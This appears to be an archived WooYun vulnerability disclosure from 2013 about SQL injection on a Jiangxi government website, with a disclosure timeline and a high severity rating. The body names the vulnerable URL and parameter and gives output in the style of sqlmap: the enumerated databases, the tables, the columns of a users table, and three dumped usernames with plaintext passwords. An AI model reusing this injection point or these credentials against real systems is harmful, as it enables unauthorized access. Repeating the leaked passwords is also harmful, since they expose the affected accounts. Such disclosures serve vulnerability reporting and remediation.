乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-15: 细节已通知厂商并且等待厂商处理中 2013-10-19: 厂商已经确认,细节仅向厂商公开 2013-10-29: 细节向核心白帽子及相关领域专家公开 2013-11-08: 细节向普通白帽子公开 2013-11-18: 细节向实习白帽子公开 2013-11-29: 细节向公众公开
........
................
注入点http://2009.jxrd.gov.cn/jxrd_old/news/show/rdshowlist.asp?%25KindName=%CB%B4%F3%B9%AB%B8&NewsLevel=
available databases [[*] a[*] award[*] fzxyManagerOk[*] jmkx[*] jxmz2005[*] jxrd2008[*] jxrd_old[*] lgb[*] master[*] memo[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] udsManager[*] xinfangManager
Database: jxrd_old[24 tables]+-----------------------------+| dbo.D99_Tmp || dbo.News_DesignNames_Tab || dbo.News_DesignRights_Tab || dbo.News_Design_Tab || dbo.News_KindRights_Tab || dbo.News_Kinds_Tab || dbo.News_LocationRights_Tab || dbo.News_Locations_Tab || dbo.News_Master_Tab || dbo.News_OtherRights_Tab || dbo.News_Others_Tab || dbo.News_Temp_Tab || dbo.News_TopicRights_Tab || dbo.News_Topics_Tab || dbo.News_Users_Tab || dbo.Temp_Tab || dbo.dirs || dbo.dtproperties || dbo.sysconstraints || dbo.syssegments || dbo.xiaolu || jxrd.D99_Tmp || jxrd.Hack520_Pig_Tmp || jxrd.jiaozhu |+-----------------------------+
Database: jxrd_oldTable: dbo.News_Users_Tab[14 columns]+------------------+---------+| Column | Type |+------------------+---------+| Manage_Designs | int || Manage_Kinds | int || Manage_Locations | int || Manage_Others | int || Manage_Topics | int || Manage_Users | int || News_Level | int || Users_BmpURL | int || Users_Email | int || Users_Id | int || Users_Names | varchar || Users_Note | varchar || Users_Passwd | varchar || Users_selfURL | varchar |+------------------+---------+
Database: jxrd_oldTable: dbo.News_Users_Tab[3 entries]+----------+-------------+--------------+| Users_Id | Users_Names | Users_Passwd |+----------+-------------+--------------+| 75 | jxrd | jxrd626604 || 94 | xcc | 842100 || 97 | 333 | 333 |+----------+-------------+--------------+
...............
危害等级:高
漏洞Rank:11
确认时间:2013-10-19 21:07
暂无